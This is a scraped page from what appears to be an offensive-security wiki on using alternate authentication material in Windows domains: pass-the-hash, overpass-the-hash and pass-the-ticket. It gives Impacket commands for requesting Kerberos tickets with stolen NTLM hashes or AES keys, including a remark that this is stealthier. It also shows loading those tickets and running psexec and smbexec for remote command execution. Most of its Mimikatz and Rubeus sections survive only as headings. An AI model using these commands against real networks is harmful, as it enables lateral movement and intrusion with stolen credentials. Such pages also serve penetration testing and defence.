search

Use Alternate Authentication Material

hashtag
Application Access Token

hashtag
Pass the Hash

hashtag
Overpass The Hash/Pass The Key (PTK)

hashtag
Impacket

Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Set the TGT for impacket use

export KRB5CCNAME=<TGT_ccache_file>

Execute remote commands with any of the following by using the TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

hashtag
Rubeus and PsExec

Ask and inject the ticket

Execute a cmd in the remote machine

hashtag
Pass the Ticket

hashtag
Pass The Ticket (PTT)

hashtag
Harvest tickets from Linux

  • Check type and location of tickets:

  • If none return, default is FILE:/tmp/krb5cc_%{uid}.

  • In case of file tickets, you can copy-paste (if you have permissions) for use them.

  • In case of being *KEYRING* tickets, you can use tickeyarrow-up-right to get them:

hashtag
Harvest tickets from Windows

With Mimikatzarrow-up-right:

With Rubeusarrow-up-right in Powershell:

After dump with Rubeus tickets in base64, to write the in a file

To convert tickets between Linux/Windows format with ticket_converter.pyarrow-up-right:

hashtag
Using ticket in Linux:

Set the ticket for impacket use

Execute remote commands with any of the following by using the TGT

hashtag
Using ticket in Windows

Inject ticket with Mimikatzarrow-up-right:

Inject ticket with Rubeusarrow-up-right:

Execute a cmd in the remote machine with PsExecarrow-up-right:

hashtag
Web Session Cookie

PreviousTaint Shared ContentNextCollection

Last updated

Was this helpful?